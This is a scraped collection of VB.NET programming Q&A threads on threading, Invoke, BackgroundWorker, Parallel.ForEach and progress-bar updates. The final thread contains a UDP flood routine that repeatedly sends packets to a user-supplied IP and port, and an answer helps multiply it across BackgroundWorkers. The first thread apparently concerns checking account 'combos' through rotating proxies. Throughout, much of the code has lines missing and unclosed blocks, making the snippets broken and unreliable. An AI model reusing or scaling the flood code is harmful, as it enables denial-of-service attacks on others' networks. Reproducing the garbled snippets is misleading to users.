VB.net ContinueWith - vb.net

I have this code which loops through all my accounts in my list and then does something to the accounts using tasks for each account as a way to speed up the process. Each time the program completes this action, I want the user interface to update the progress bar. I was using Invoke before but it isn't the best option and I couldn't get it working. Now I know this can be done using a background worker but this isn't the best way of making your application multithreaded so I used this. And instead of invoking I heard about ContinueWith but I can't seem to get it working and I get no error message just a red underline.
progressBar.Value = 0
Dim tasks As New List(Of Task)()
For Each account In combos
Dim t As Task = Task.Run(Sub()
While checked = False
If proxies.Count = 0 Then
Exit Sub
'Also can't think of a good way to stop searching through accounts when there are no proxies left in my queue.
End If
Dim proxy As New WebProxy(proxies(0))
'Do something
End While
checkedAmount += 1
Dim progress As Integer = ((checkedAmount / combos.Count) * 100)
Task.ContinueWith(progressBar.Value = progress, TaskScheduler.FromCurrentSynchronizationContext()) 'Error here
End Sub)
I get no error code as shown here:
I have also tried putting a sub after and stuff but that lead to nothing.
Thanks for any help in advance.
Update tried with invoke:
Private Delegate Sub UpdateProgressBarDelegate(ByVal progressBarUpdate As ProgressBar, ByVal value As Integer)
Dim checkedAmount As Integer = 0
Dim checked As Boolean = False
Private Sub startBtn_Click(sender As Object, e As EventArgs) Handles startBtn.Click
progressBar.Value = 0
Dim tasks As New List(Of Task)()
For Each account In combos
Dim t As Task = Task.Run(Sub()
While checked = False
'do stuff
End While
checkedAmount += 1
Dim progress As Integer = ((checkedAmount / combos.Count) * 100)
If Me.InvokeRequired = True Then
Me.Invoke(New UpdateProgressBarDelegate(AddressOf UpdateProgressBar), progressBar, progress)
UpdateProgressBar(progressBar, progress)
End If
'Task.ContinueWith(progressBar.Value = progress, TaskScheduler.FromCurrentSynchronizationContext())
End Sub)
End Sub
Private Sub UpdateProgressBar(ByVal ProgressBarUpdate As ProgressBar, progress As Integer)
progressBar.Value = progress
End Sub
Still doesn't work not sure why?

Now I know this can be done using a background worker but this isn't the best way of making your application multithreaded
Sort of.
BackgroundWorker is a poor way to run many different Tasks individually. No one wants to deal with a separate BackgroundWorker component for each Task. But one BackgroundWorker is a great way to spawn just one extra thread to manage all your other Tasks and update the progress bar. It's an easy solution here.
Either way, the one thing you'll want to do for sure is move the code to update the ProgressBar out of the individual Tasks. Having that inside a Tasks violates separation of concerns1. Once you do that, you'll also need to change the call to WaitAll() to use WaitAny() in a loop that knows how many tasks you have, so you can still update the ProgressBar as each Task finishes. This will likley have the side effect of fixing your current issue, as well.
Private Async Sub startBtn_Click(sender As Object, e As EventArgs) Handles startBtn.Click
Dim tasks As New List(Of Task)()
For Each account In combos
Dim t As Task = Task.Run(Sub()
While Not checked
'do stuff
End While
End Sub)
progressBar.Value = 0
For i As Integer = 1 To tasks.Count
Dim t = Await Task.WhenAny(tasks)
progressBar.Value = (i / combos.Count) * 100
Next i
End Sub
1 The problem here illustrates one reason we care about separation of concerns at all. Once I fix this, the code becomes much simpler and the frustrating errors just go away.

The above waitany is unnecessary.
I have found that you might as well put your progress bar code directly into the task run sub:
Dim ProgressBarSync As New Object
Dim tasks As New List(Of Task)()
For Each account In combos
Dim t As Task = Task.Run(
'do stuff
SyncLock ProgressBarSync
End SyncLock
End Sub)


How to make BackgroundWorker result consistent

I am using a background worker to poll digital IO state from my PLC with MODBUS through serial com port. The background worker is used for READ only operation with polling speed of 200 ms between each cycle. The number of I/O to read in one cycle is around 50 bits (1 io state = 1 boolean). I then simulate a WRITE command to the PLC by toggling all I/O to it's opposite state (ON -> OFF / OFF -> ON) from the UI thread. I put the Toggle() sub routine into a timer with an interval of 100 ms and execute for 3000 ms. The result is some of the ports are not consistent. The starting state is either all ON or all OFF. The expected result after the toggle is also either all ON or all OFF. Sometimes the end result is 45 io ON and 5 io OFF. Sometimes it is 40 io OFF and 10 io ON. The result is always random but never the correct result which is all io ON or all io OFF.
Interestingly, if I use Timer instead of background worker to do the polling, the toggle result is always consistent ( all 50 IO either ON or OFF ). I prefer to use background worker for the polling because the UI is much smoother. When I use timer, the UI feels a little bit "laggy". However, the background worker is causing inconsistent result.
Below is simplified version of my codes to illustrate the my situation. I hope somebody can point me to the right direction. The background worker is working fine polling the io state. But as soon as I manipulate the port from the UI thread, the command is not 100% guaranteed to be executed at all time which is a serious problem for me !
I put the MODBUS read operation in the DoWork sub routine and pass the read result to UI thread using the Backgroundworker.ReportProgress(0, objResult). Therefore, the read and write manipulation of the object are both happening in the same UI thread. Why the result is still inconsistent?
Public Class Bit
Private _LastValue As Boolean
Private _Label As Control
Private DictControl As New Dictionary(Of String, Control)
Sub SetCoil(val As Boolean)
'Do work here
'Update last value
End Sub
Function GetCoil() As Boolean
Dim result As Boolean = True
'Do work here
'Update last value
Return result
End Function
Sub Toggle()
Dim result As Boolean = Not _LastValue
'invert current value
'set current value = not current value
'Update last value
End Sub
Sub SetLastValue(val As Boolean)
_LastValue = val
Dim ctlText As String = ""
If _LastValue = True Then
ctlText = "ON"
ctlText = "OFF"
End If
'Update label
For Each c As KeyValuePair(Of String, Control) In DictControl
c.Value.Text = ctlText
End Sub
Sub AddControl(key As String, c As Control)
DictControl.Add(key, c)
End Sub
End Class
Public Class Main
Const BIT_COUNT = 50
Dim bgw As New System.ComponentModel.BackgroundWorker
Dim dictBit As New Dictionary(Of Integer, Bit)
Sub New()
'Create a bunch of label and bit instances
'Add label control to Bit
'Add Bit to dictBit dictionary
'Add Handler to Background Worker
'Run Background Worker
'Run Timer
End Sub
Sub bgw_DoWorkHandler(sender As Object, e As System.ComponentModel.DoWorkEventArgs)
Dim Coils(49) As Boolean
Dim result() As Boolean
Dim run As Boolean = True
'Do some processing & assign Coils value
result = Coils.Clone 'Duplicate the variable
bgw.ReportProgress(0, result)
Loop While run = True
End Sub
Sub bgw_ProgressChanged(sender As Object, e As System.ComponentModel.ProgressChangedEventArgs)
Dim results() As Boolean = DirectCast(e.UserState, Boolean())
Dim i As Integer
For i = 0 To UBound(results)
If dictBit.ContainsKey(i) Then
dictBit(i).SetLastValue(results(i)) 'Set last value and update Label
End If
End Sub
Sub TimerTickHandler(ByVal sender As Object, ByVal e As EventArgs)
'Background worker alternative.
Dim Coils(49) As Boolean
Dim result() As Boolean
Dim run As Boolean = True
'Do some work & assign Coils value
result = Coils.Clone
bgw.ReportProgress(0, result)
End Sub
Sub ToggleBits()
Dim i As Integer
For i = 0 To BIT_COUNT - 1
End Sub
Sub TimerToggleHandler(ByVal sender As Object, ByVal e As EventArgs)
'Interval = 100 ms. Run for 3000 ms before stop.
End Sub
End Class
The Background Worker is reading the IO during the toggle. That's why all 50 points aren't the same value.
Actual hardware inputs can change at any time. Even the a split second before or after your read. If this toggle routine is only for testing, then ignore the discrepancies. Otherwise, update a flag or fire an event at the end of the toggle. Anything to force the BW to wait until the toggle is complete before reading.

Need a fix for my deadlocking issue with my parallel.foreach

When running my code I seem to encounter deadlocks while trying to update a GUI element from within one of the parallel tasks.
I've tried surrounding the Output function with "Synclock me" to try to ensure that only one task is trying to update the control at a time.
Private Sub RunParallel(records as list(of DataRecord), ou as String)
Dim ParallelOptions As New ParallelOptions
ParallelOptions.MaxDegreeOfParallelism = 10
Parallel.ForEach(records, ParallelOptions, Sub(myrecord)
ProcessRecord(myrecord, ou)
End Sub)
Output("Done...." & vbCrLf)
End Sub
Private Sub ProcessRecord(ByVal record As DataRecord, ByVal ou As String)
'Output($"BromcomID = {record("ID")}, Forename = {record("Forename")}{vbCrLf}")
Dim ud As New UserDetails With {
.EmployeeID = record("ID"),
.SamAccountName = record("SamAccountName"),
.GivenName = record("Forename"),
.Surname = record("Surname")
If Not CreateUser(ou, ud) Then
' Output($"Error creating {ud.EmployeeID}{vbCrLf}")
End If
End Sub
Private Sub Output(ByVal s As String)
SyncLock Me
If Me.InvokeRequired Then
Outbox.SelectionStart = Len(Outbox.Text)
End Sub)
Outbox.SelectionStart = Len(Outbox.Text)
End If
End SyncLock
End Sub
The code as supplied seems to run, but if I uncomment out the Output calls in the ProcessRecord() function, it hangs and never gets exits the Parallel.foreach
--- Update
After playing around with suggestions and comments on here I still can't get it to work correctly.
If I take out all of the output from ProcessRecord it seems to work correctly. However with the following code, it now seems to run each ProcessRecord sequentially (not 10 at a time as I intended), and then hangs after the last one.
Output("Dispatching" & vbCrLf)
Dim ParallelOptions As New ParallelOptions With {
.MaxDegreeOfParallelism = 10
Parallel.ForEach(recordList, ParallelOptions, Sub(myrecord)
ProcessRecord(myrecord, ou)
End Sub)
'For Each myrecord As DataRecord In recordList
' Task.Factory.StartNew(Sub() ProcessRecord(myrecord, ou))
Output("Done...." & vbCrLf)
End Sub
Private Sub ProcessRecord(ByVal record As DataRecord, ByVal ou As String)
Dim ud As New UserDetails With {
.EmployeeID = record("ID"),
.SamAccountName = record("SamAccountName"),
.GivenName = record("Forename"),
.Surname = record("Surname"),
.DisplayName = $"{record("Forename")} {record("Surname")} (Student)"}
If Not CreateUser(ou, ud) Then
' Output($"Error creating {ud.EmployeeID}{vbCrLf}")
End If
Output($"BromcomID = {record("ID")}, Forename = {record("Forename")}{vbCrLf}")
End Sub
Private Sub Output(ByVal s As String)
If Me.InvokeRequired Then
End Sub)
Outbox.SelectionStart = Outbox.TextLength
End If
End Sub
If I use the commented out Task.Factory code everything seems to work perfectly, except I cant control how many tasks at a time are launched, and I can't wait till all of them have finished, the for loop just launches all the tasks, and then carries on with the Output("Done....) line.
The synclock statements didn't seem to affect anything either way.
Give this a try
Private Sub Output(ByVal s As String)
If Me.InvokeRequired Then
Me.Invoke(Sub() Output(s))
'Me.BeginInvoke(Sub() Output(s))
Outbox.SelectionStart = Outbox.TextLength
End If
End Sub
There may be an issue if you have events tied to Outbox, like text changed. Tested Output method with
Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
Dim nums As New List(Of Integer)
For x As Integer = 1 To 500
'because it is in a button, run from a task
Dim t As Task
t = Task.Run(Sub()
Parallel.ForEach(nums, Sub(num)
Output(num.ToString & Environment.NewLine)
End Sub)
End Sub)
End Sub
If you want to go ahead with using a Task-based approach, then you certainly can control how many are launched at a time, and wait for all of them to finish. It requires some additional code for the manual management. This is discussed in some detail in Microsoft documentation: https://learn.microsoft.com/en-us/dotnet/standard/asynchronous-programming-patterns/consuming-the-task-based-asynchronous-pattern
It's not necessarily a bad thing to initiate all of the tasks immediately, then you'll be leaving it to the thread pool to take care of how many to run at a time.
If you want greater control, you can use the "throttling" design from the link. In your "pending" queue, store delegates/lambdas that will themselves kick off Task.Run. Then, as you dequeue from the "pending" queue into the "active" list, you can Invoke on the delegate/lambda to get the Task and Await Task.WhenAny on the "active" list.
One potential benefit of doing things this way is that the work in each top-level Task can be split between UI work running on the UI thread and processor-limited work running on the thread pool.
(I'm not suggesting that this is necessarily the best option for you, just trying to expand on what you should be looking at doing if you really want to pursue using Task instead of Parallel.)

vb.net problems with invoke

I have a thread that runs background jobs and is required to update the GUI once in a while. My program has been designed so that when the user clicks off of a form, the thread and background operations still run, yet the controls have been disposed (for memory management purposes).
I have been using Invoke() and "If Control.Created = True" to make sure that the thread can successfully update the controls without running into any exceptions. However, when the form is recreated, all "Control.Created" values are false and Invoke() fails with "{"Invoke or BeginInvoke cannot be called on a control until the window handle has been created."}"
My guess is that this has something to do with the fact that when the form is recreated it is assigned different handles and that the "Invoke()" is looking at the old handle. SO my question is, how do I fix this?
EDIT: As per requested, the code for opening the form and where the bg thread works from
Opening the DropLogMDIalt form is simply
The Background Thread runs when the control is modified so that the NumericUpDown is more than 0 (so that there is something to countdown from)
Private Sub NLauncherTerminateInput_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DLScanInterval.ValueChanged
If DLScanInterval.Created = True Then
DLTimerControlValue = DLScanInterval.Value
If DLTimerControlValue = 0 Then
If DLScanIntervalControl.Active = False Then
End If
End If
End If
End Sub
Public Sub BeginDropLogTimer()
Dim N As New Threading.Thread(AddressOf DropLogTimerIntervalThreadWorker)
DLScanIntervalControl.ThreadID = N.ManagedThreadId
DLScanIntervalControl.Active = True
End Sub
Public Sub CancelDropLogTimer()
DLScanIntervalControl.Active = False
End Sub
Public Sub DropLogTimerIntervalThreadWorker()
DLScanTimerSecondsLeft = DLTimerControlValue * 60
Dim s As Integer = DLTimerControlValue
Do Until 1 = 2
DLScanTimerSecondsLeft = DLTimerControlValue * 60
Do Until DLScanTimerSecondsLeft <= 0
If Not (DLTimerControlValue = 0 Or DLScanIntervalControl.CancelPending = True) Then
Exit Sub
End If
If Not DLTimerControlValue = s Then
DLScanTimerSecondsLeft = DLTimerControlValue * 60
s = DLTimerControlValue
End If
Dim ToInvoke As New MethodInvoker(Sub()
Timer(DLScanTimerSecondsLeft, ":", DLScanIntervalTB)
End Sub)
If (Me.IsHandleCreated) Then
If (InvokeRequired) Then
End If
End If
DLScanTimerSecondsLeft -= 1
CompareScan = True
End Sub
The thread is simply called by declaring a new thread.thread, however, I have created a class and a variable that the thread uses to check if it should still be running or not (similarly to how a backgroundworker would) this is illustrated by the "DLScanIntervalControl.CancelPending"
The form is then closed later by
It can be reopened if the user clicks on a label that then uses the same method as shown above (FormCTRL.Show())
From MSDN:
"If the control's handle does not yet exist, InvokeRequired searches up the control's parent chain until it finds a control or form that does have a window handle. If no appropriate handle can be found, the InvokeRequired method returns false."
In other words, you need to verify that the handle is created and then check if invoke is required.
If(Me.IsHandleCreated) Then
If(Me.InvokeRequired) Then
End If
End If
I had a similar error when trying to use delegates to update controls on a form in another thread. I found that the handle is only created when it's "needed". I'm not sure what constitutes "needed", but you can force it to create the handle by accessing the Handle property of the object.
What I had done in my application is this:
' Iterate through each control on the form, and if the handle isn't created yet, call the
' Handle property to force it to be created
For Each ctrl As Control In Me.Controls
While Not ctrl.IsHandleCreated
Dim tmp = ctrl.Handle
tmp = Nothing
End While ' Not ctrl.IsHandleCreated
Next ' ctrl As Control In Me.Controls
It's rather ghetto, but it may help you here (If you still need the help)
I think the issue here has nothing to do with invoking, but references. Following this pseudocode...
Dim A As New Form1
''Spawn background thread with a reference to A
Dim B As New Form1
The thread is attempting to refer to the first instance of Form1 above which is disposed and will always stay that way.
If you want the thread to be able to update any form then you need to give the thread a (synchronised) way to refer to the form...
Public Class Worker
Private Target As Form1
Private TargetLock As New Object
Public Sub SetTargetForm(Frm as Form1)
SyncLock TargetLock
Target = Frm
End SyncLock
End Sub
Public Sub DoWork() ''The worker thread method
''Do work as usual then...
SyncLock TargetLock
If Target IsNot Nothing AndAlso Target.IsHandleCreated Then
If Target.InvokeRequired
End If
End If
End SyncLock
End Sub
End Class
This way, when a new form is available, you can inform the worker thread using SetTargetForm() and it will update the appropriate one.
Of course, you'd be better off refactoring the "Update UI" checks and invoke calls into a different method for simplicity/maintainability but you get the point.
Note that I haven't got an IDE to hand so there may be typos.
One final point... I'd question the value of disposing a form for memory management purposes. Controls are fairly lightweight in terms of memory and it's far more common for an object used by the form to be a memory hog than the form itself. Are you sure you're getting a real benefit for this added complexity?

Stop all threads if an error is detected in one of them

I am trying to implement multi-threading into an app. The app needs to create a variable number of threads whilst passing variables across. I can easily create the threads, however I am trying to figure out a way to be able to stop all threads at once and if an error is caught in any one of these threads, stop all of them.
My current solution is to enclose the functions in a loop that checks if a boolean value is "True", in which case the thread carries on. If there is an error, I change the value to "False" and all the threads stop. Similarly if I want to stop the threads manually I can set the value to "false" from a function.
Is there a better solution to this, as the main issue is the threads must reach the end of the loop before they stop completely?
Try this
Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
Dim foo As New List(Of Threading.Thread)
Threading.Interlocked.Exchange(stopRun, 0L)
For x As Integer = 1 To 5 'start five threads
Dim t As New Threading.Thread(AddressOf workerThrd)
t.IsBackground = True
foo.Add(t) 'add to list
Threading.Thread.Sleep(2000) 'wait two seconds
Threading.Interlocked.Increment(stopRun) 'signal stop
For Each t As Threading.Thread In foo 'wait for each thread to stop
End Sub
Dim stopRun As Long = 0L
Private Sub workerThrd()
Do While Threading.Interlocked.Read(stopRun) = 0L
Threading.Thread.Sleep(10) 'simulate work
End Sub
Running the threads in a while True block should be fine. Once its false, you could just iterate over the threads and call thread.abort() even though sometimes using abort isnt a good idea. Using a list of threads could be helpful. I dont know how you are creating your threads but this should be easy to understand.
Dim listThreads As List(Of Threading.Thread)
'create/instantiate your threads adding them to the collection something like the following
For i = 1 To numberofthreadsyouneed
Dim tempThread As Threading.Thread = New Threading.Thread
Instead of using a while block just do a Try catch. inside the catch iterate over the list to abort the threads
Catch ex As Exception
For each Thread in listThreads
end Try
If you want more control
is a pretty sweet thing called Tasks that they come out with a while back. It gives you a little more control over your threads
Hope this helps.

VB.NET - Running one sub multiple times at once

I have one Private sub that runs in a loop. I want the sub to run multiple times at once. For example the program runs, you press start; you run the program again and press start, again and again... the same program doing the job at once. now i just want one program do to it alone. But i would like it to be user defined. exp. run program. type in a text box 10. press start. and it works as if 10 of them work open working on the same thing.
I have seen another program made with vb.net 2010 and its what i use and do not know how to do it. so i am just wondering.
Private Sub Flood1(ByVal sender As Object, ByVal e As DoWorkEventArgs) Handles Flood.DoWork
Dim IP As IPAddress = IPAddress.Parse(TextBox1.Text)
Dim IPPort As New IPEndPoint(IP, Convert.ToInt32(TextBox2.Text))
Dim PacketS As Byte() = New Byte(TextBox3.Text) {}
Dim SocketN As Integer = Convert.ToInt32(TextBox4.Text)
Do While Flooding = True
For i = 0 To SocketN
If Flooding = True Then
Dim _Sock(i) As Socket
_Sock(i) = New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
_Sock(i).SendTo(PacketS, IPPort)
Catch ex As Exception
End Try
Exit Do
End If
End Sub
Mostly want to have this work over and over at once by the users choice... kinda hoped not to use this code else might not get helped.
You can use background worker for that.
Once you know how many workers you want to do the job
just create those many instances of background worker.
Tell me if this is the answer you are looking for or not
Sample Source Code
Imports System.ComponentModel
Module Module1
Sub Main()
Console.WriteLine("Please enter the worker count:")
Dim workerCount As Integer = Console.ReadLine()
For i As Int16 = 0 To workerCount
Dim worker As BackgroundWorker = New BackgroundWorker
worker.RunWorkerAsync(i + 1)
AddHandler worker.DoWork, AddressOf Worker_DoWork
End Sub
Private Sub Worker_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs)
End Sub
End Module